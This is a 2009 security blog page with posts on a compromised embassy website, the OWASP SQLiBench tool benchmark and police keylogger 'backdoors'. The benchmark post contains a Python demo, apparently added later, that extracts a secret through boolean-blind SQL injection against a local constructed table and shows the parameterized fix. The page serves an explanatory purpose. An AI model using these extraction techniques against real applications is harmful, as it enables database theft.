Thursday, January 29, 2009

Indian Embassy in Spain spreading malware

| Armando Romeo |
Ismael Valenzuela kindly reported to me an interesting incident involving the website of the Indian Embassy in Spain. It seems that the website has been compromised and pieces of malware are being loaded from three different locations.

The researcher has contacted the Embassy, but no response has been received so far.
You can find a more in-depth analysis of the incident here.
Thanks go to Ismael for finding and reporting it.

Tuesday, January 13, 2009

SQLiBENCH - Benchmarking tool for sqli injectors

| Armando Romeo |
SQL injection exploitation is one of the most important steps of a web application testing engagement.
There are many tools around, each with its unique features and its own area of use.

What are the discriminating factors among current SQL injection tools?
  • DBMS fingerprinting and support
    Some tools can deal with only a few versions of the same DBMS, while others
    can handle several different DBMSs.
  • Speed, in terms of the number of requests required to achieve a given task (dump a table, dump rows, gain privileges, read or write files...)
Techniques to exploit this kind of vulnerability have been refined to keep the number of requests sent to the web server at a minimum, reducing the time spent dumping data and maximizing results. There's no killer application here: so far, no single tool can be used against every DBMS.
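To make the "number of requests" criterion concrete, here is an added example (written for this page, not code from SQLiBench or from any of the benchmarked injectors). It stands up a constructed in-memory SQLite table behind a deliberately injectable lookup that only reveals whether a row was returned (a boolean-blind oracle), then reads a secret column out through that oracle in two ways: a naive linear scan over lengths and characters, and the binary-search refinement that real injectors use. The table, the secret value and the `users`/`secret` names are all assumptions made for the example; a parameterized version of the same lookup is included to show the oracle disappearing.

```python
import sqlite3

# Constructed target for this example: an in-memory SQLite database standing in
# for the vulnerable application's backend. Names and the secret are made up.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE users (id INTEGER, name TEXT, secret TEXT)")
_conn.execute("INSERT INTO users VALUES (1, 'alice', 'S3cr3t!')")
_conn.commit()

# Every oracle call is counted so the two extraction strategies can be compared.
REQUESTS = {"count": 0}


def vulnerable_lookup(user_input: str) -> bool:
    """Deliberately injectable lookup: user input is concatenated into the SQL.
    The caller only learns whether any row came back (a boolean-blind oracle)."""
    REQUESTS["count"] += 1
    rows = _conn.execute("SELECT name FROM users WHERE id = " + user_input).fetchall()
    return len(rows) > 0


def safe_lookup(user_input: str) -> bool:
    """Hardened form: the value is bound as a parameter, so injected SQL is
    treated as data and the oracle disappears."""
    rows = _conn.execute("SELECT name FROM users WHERE id = ?", (user_input,)).fetchall()
    return len(rows) > 0


def oracle(condition: str) -> bool:
    """Ask the injectable endpoint whether an arbitrary SQL condition holds."""
    return vulnerable_lookup(f"1 AND ({condition})")


# The sub-select whose result we want to read out through the oracle (assumed).
SUBQUERY = "(SELECT secret FROM users WHERE id = 1)"


def _bisect(predicate_template: str, lo: int, hi: int) -> int:
    """Binary search for the value of an integer expression in [lo, hi].
    predicate_template is 'expr > {v}'; this costs ceil(log2(hi - lo + 1)) requests."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(predicate_template.format(v=mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_bisect(subquery: str = SUBQUERY, max_len: int = 64):
    """Blind extraction with binary search on the length and on each character.
    Returns (recovered string, number of requests used)."""
    REQUESTS["count"] = 0
    length = _bisect(f"length({subquery}) > {{v}}", 0, max_len)
    chars = [chr(_bisect(f"unicode(substr({subquery},{pos},1)) > {{v}}", 0, 127))
             for pos in range(1, length + 1)]
    return "".join(chars), REQUESTS["count"]


def extract_linear(subquery: str = SUBQUERY, max_len: int = 64):
    """Naive extraction: try each possible length, then each printable character
    in turn for every position. Returns (recovered string, number of requests)."""
    REQUESTS["count"] = 0
    length = next(n for n in range(max_len + 1) if oracle(f"length({subquery}) = {n}"))
    chars = []
    for pos in range(1, length + 1):
        for code in range(32, 127):
            if oracle(f"unicode(substr({subquery},{pos},1)) = {code}"):
                chars.append(chr(code))
                break
    return "".join(chars), REQUESTS["count"]


if __name__ == "__main__":
    for name, fn in (("linear", extract_linear), ("bisect", extract_bisect)):
        value, n = fn()
        print(f"{name:6s}: {value!r} recovered in {n} requests")
    print("parameterized lookup with the same payload:", safe_lookup("1 AND (1=1)"))
```

On the 7-character secret above, the bisecting extractor needs 6 requests for the length plus 7 per character (55 in total), while the linear scan needs several hundred; that ratio, not raw speed, is what the "speed in requests" criterion is measuring, and it is why a benchmark has to count requests per task rather than wall-clock time.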

But at least we have SQLiBench, an OWASP-powered project that aims at, guess what?, benchmarking these tools.

The goal of the project is to create a detailed set of benchmarking criteria for automatic SQL injection tools and to apply them to a set of open source SQL injectors, producing analysis and benchmarking reports. Additionally, in a semi-academic manner, the algorithms used by the targeted SQL injectors will be analyzed, both implementation-wise and complexity-wise.

This is an extract of the great Tools Benchmarked matrix available here:

The SQLiBench project page is here.

Monday, January 12, 2009

Police Backdoors

| Yash Kadakia |
I ran across an article titled "Police set to step up hacking of home PCs" the other day. It details a new law approved by the UK government allowing police to hack into suspects' home computers. In order to carry out these hacks, they will be sending e-mails with virus attachments or breaking into homes and installing keystroke loggers.

This kind of behavior is displayed by most governments these days. What did surprise me, however, is that they asked security product and service providers to stop detecting and blocking their keystroke loggers and other malicious tools.

I was glad to read that a few security vendors have taken issue with this and refused to cooperate. As per ZDNet, the security vendors Kaspersky Labs and Sophos told ZDNet UK that they would not make any concession in their protective software for the police hack.

Symantec declined to comment on whether it would block a police hack, saying the matter was "politically sensitive". However, the security vendor has said in the past that it would not scan for the FBI's Magic Lantern keystroke-logging software.

I personally think the entire concept is ridiculous, especially the part where security vendors are expected to turn a blind eye to these police hacks. I feel that an AV product that would voluntarily miss malicious code used for these police hacks would probably, as a direct result, miss other malicious code too.

Also, if any malicious users or malware authors were to get their hands on this police code (which is fairly likely, since it is installed on suspects' PCs), it would be fairly easy to reverse engineer it and create malware that mimics its behavior and bypasses security software.

Security through obfuscation, i.e. hoping that no one will look there, or look deeply enough, is always a bad idea. The entire concept of asking vendors to create police backdoors sounds to me like a malformed version of "security through obfuscation".

Originally from: Yash Kadakia's Indian IT Security Blog
